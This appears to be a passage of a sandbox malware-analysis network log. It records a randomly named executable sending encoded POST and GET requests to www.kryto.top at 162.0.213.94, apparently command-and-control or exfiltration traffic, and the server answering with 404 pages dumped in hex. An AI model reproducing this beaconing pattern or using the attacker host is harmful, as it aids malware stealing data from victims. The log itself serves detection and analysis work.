                                          Data Ascii: dxWljT6=mZ3m6Qa3ZY/2HyGLeI1CQlrG0QhnppC3Vg0jcU+Q6y8BnJIzAc081UnVdAWmdEYS0shTzsxnSIe3K2Q85xNHTJcd65UJuA4LCCKowp9quibJ+rBmgA6BYf7Xs2SWdaaAICGZmphkDHrokzD8PEo1QT7yYi1DuXSafLZQlDtAPlRoMUpFHEQcHInhSg1mYvzSsAPbUVr26mysSA6SrYBFQos=
                                          Sep 7, 2024 21:44:43.920993090 CEST1236INHTTP/1.1 404 Not Found
                                          Date: Sat, 07 Sep 2024 19:44:43 GMT
                                          Server: Apache
                                          Content-Length: 16052
                                          Connection: close
                                          Content-Type: text/html
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                          Sep 7, 2024 21:44:43.921118975 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                          Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                          Sep 7, 2024 21:44:43.921130896 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                          Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                          Sep 7, 2024 21:44:43.921649933 CEST1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                          Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                          Sep 7, 2024 21:44:43.921677113 CEST896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                          Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                          Sep 7, 2024 21:44:43.921689034 CEST1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                          Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                          Sep 7, 2024 21:44:43.922636986 CEST1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                          Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                          Sep 7, 2024 21:44:43.922647953 CEST1236INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                          Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                          Sep 7, 2024 21:44:43.922657967 CEST1236INData Raw: 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20
                                          Data Ascii: e-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560" d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;s
                                          Sep 7, 2024 21:44:43.923490047 CEST1236INData Raw: 2d 77 69 64 74 68 3a 30 2e 38 32 31 37 30 32 32 34 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a
                                          Data Ascii: -width:0.82170224;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse transform="translate(-170.14515,-0.038164)" ry="3.880542" rx="3.5777507" cy="164.5713"
                                          Sep 7, 2024 21:44:43.927473068 CEST1236INData Raw: 79 6c 65 3d 22 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e
                                          Data Ascii: yle="fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4578" d="m 314.72098,177.


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          15192.168.2.456244162.0.213.94804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:44:45.869394064 CEST10860OUTPOST /09dt/ HTTP/1.1
                                          Host: www.kryto.top
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 10304
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.kryto.top
                                          Referer: http://www.kryto.top/09dt/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 6d 5a 33 6d 36 51 61 33 5a 59 2f 32 48 79 47 4c 65 49 31 43 51 6c 72 47 30 51 68 6e 70 70 43 33 56 67 30 6a 63 55 2b 51 36 79 45 42 6e 38 63 7a 42 37 67 38 30 55 6e 56 65 41 57 6c 64 45 59 50 30 73 35 66 7a 73 39 52 53 4f 53 33 4c 54 45 38 78 67 4e 48 47 35 63 64 32 5a 55 49 71 41 34 65 43 44 36 73 77 70 74 71 75 69 62 4a 2b 6f 5a 6d 77 46 4f 42 61 66 37 49 34 6d 53 53 57 36 61 73 49 43 76 75 6d 70 30 54 41 32 4c 6f 6b 54 7a 38 4a 6d 51 31 4d 44 37 30 62 69 30 45 75 58 50 61 66 4b 30 68 6c 43 5a 71 50 6e 4e 6f 49 6c 41 75 63 48 51 51 54 4f 76 56 4e 69 74 53 5a 64 7a 65 6c 51 4c 6e 53 6e 4c 38 36 6e 4f 30 52 77 79 62 7a 6f 56 31 4e 70 71 56 64 61 63 34 50 4f 69 47 51 42 71 4b 2f 4b 57 77 76 54 6f 6d 63 31 69 65 31 31 52 4c 52 6e 58 43 34 76 38 47 38 31 4e 30 31 63 52 38 41 4f 7a 54 78 64 70 72 59 47 4d 55 72 59 53 6e 2b 42 4c 70 6f 49 65 4e 75 35 34 47 44 4d 32 47 4b 71 6b 41 30 61 77 41 37 43 69 50 4a 33 36 64 31 49 6f 6e 31 78 62 50 48 41 74 6f 38 78 38 32 64 5a 58 34 45 6a [TRUNCATED]
                                          Data Ascii: dxWljT6=mZ3m6Qa3ZY/2HyGLeI1CQlrG0QhnppC3Vg0jcU+Q6yEBn8czB7g80UnVeAWldEYP0s5fzs9RSOS3LTE8xgNHG5cd2ZUIqA4eCD6swptquibJ+oZmwFOBaf7I4mSSW6asICvump0TA2LokTz8JmQ1MD70bi0EuXPafK0hlCZqPnNoIlAucHQQTOvVNitSZdzelQLnSnL86nO0RwybzoV1NpqVdac4POiGQBqK/KWwvTomc1ie11RLRnXC4v8G81N01cR8AOzTxdprYGMUrYSn+BLpoIeNu54GDM2GKqkA0awA7CiPJ36d1Ion1xbPHAto8x82dZX4Ej3LV3Kym+zvQfTrjrYobsHxnAsgxeksa3F0slo5Spd8ly224oVGIBfpxo2vpPe8z/Tuv6MLPGNDBOgwFmMiEGMaGJspr6sEBC64RAgschvNKiTOonAju2BtKk9HfiLHhyhPgi8BVkPC9ZeI2thLPyJTt/8WeOda2SmXroYw0pTBBKfUD6t3wKBW/msPDUghDCH4AjFTRQUw8VYn689GrDDH9fWZCF+jWYhd8xy+uHbIyzRZqx4QZnzgtcKmI7IKWaNuesQeVAkxZ5SRp3xbTd1G2dYmTq2MxV+thVyNimq1QZsLg0wiQaG3JEd3ruO6DSv9gNOeU8H9QgoNC8Bs4AgtIiZzKv6LJ+PTTtmQKANsEuATz4C6udGQI1vbhICEWkMspqPcybNOHch2Q9fgFoJjBHO1NdG65WodjHFnLC0OHV2ZYGNvce5MFrrOnPG7GO2SnPzfatUe0p9NvunRdfKSLlIcViyIAhqa6ylSQXl5CWTGE3RX+4CFMeUdQDS6v+wQQ8yJ60ivqIPOLJI0F2LzsuLA/NbnnvU5DXgdQCOedU9ydSmIuas3KwnnStwvyNugOaTFKY3meGVb2dmrj+9p4pDPAx66LJZFeXK7XajeTGmyPB0ePM0WbHSZFAOekJ1JTsZ5ged+SF0XBf9+V2Cm2uwt470RmY+u [TRUNCATED]
                                          Sep 7, 2024 21:44:46.507515907 CEST1236INHTTP/1.1 404 Not Found
                                          Date: Sat, 07 Sep 2024 19:44:46 GMT
                                          Server: Apache
                                          Content-Length: 16052
                                          Connection: close
                                          Content-Type: text/html
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                          Sep 7, 2024 21:44:46.507540941 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                          Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                          Sep 7, 2024 21:44:46.507555008 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                          Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                          Sep 7, 2024 21:44:46.508029938 CEST1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                          Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                          Sep 7, 2024 21:44:46.508044004 CEST896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                          Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                          Sep 7, 2024 21:44:46.508055925 CEST1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                          Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                          Sep 7, 2024 21:44:46.508065939 CEST224INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                          Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.0
                                          Sep 7, 2024 21:44:46.508964062 CEST1236INData Raw: 30 33 34 32 39 2c 33 37 2e 31 38 31 35 39 20 2d 33 2e 30 36 34 31 35 34 2c 35 34 2e 38 36 30 33 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74
                                          Data Ascii: 03429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206
                                          Sep 7, 2024 21:44:46.508980989 CEST224INData Raw: 2e 32 33 32 36 36 20 63 20 2d 35 2e 34 34 30 31 39 32 2c 31 31 2e 35 36 32 35 31 20 2d 31 30 2e 38 38 30 39 35 31 2c 32 33 2e 31 32 36 32 32 20 2d 31 35 2e 38 39 39 36 35 37 2c 33 33 2e 35 36 33 36 38 20 2d 35 2e 30 31 38 37 30 36 2c 31 30 2e 34
                                          Data Ascii: .23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.0660
                                          Sep 7, 2024 21:44:46.508991003 CEST1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                          Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                          Sep 7, 2024 21:44:46.512506008 CEST1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                          Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          16192.168.2.456245162.0.213.94804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:44:48.412349939 CEST498OUTGET /09dt/?dxWljT6=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&GtLD=xFGdQ6FH HTTP/1.1
                                          Host: www.kryto.top
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.5
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:44:49.013868093 CEST1236INHTTP/1.1 404 Not Found
                                          Date: Sat, 07 Sep 2024 19:44:48 GMT
                                          Server: Apache
                                          Content-Length: 16052
                                          Connection: close
                                          Content-Type: text/html; charset=utf-8
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                          Sep 7, 2024 21:44:49.013950109 CEST1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                          Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                          Sep 7, 2024 21:44:49.013963938 CEST1236INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                          Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                          Sep 7, 2024 21:44:49.014542103 CEST1236INData Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                                          Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
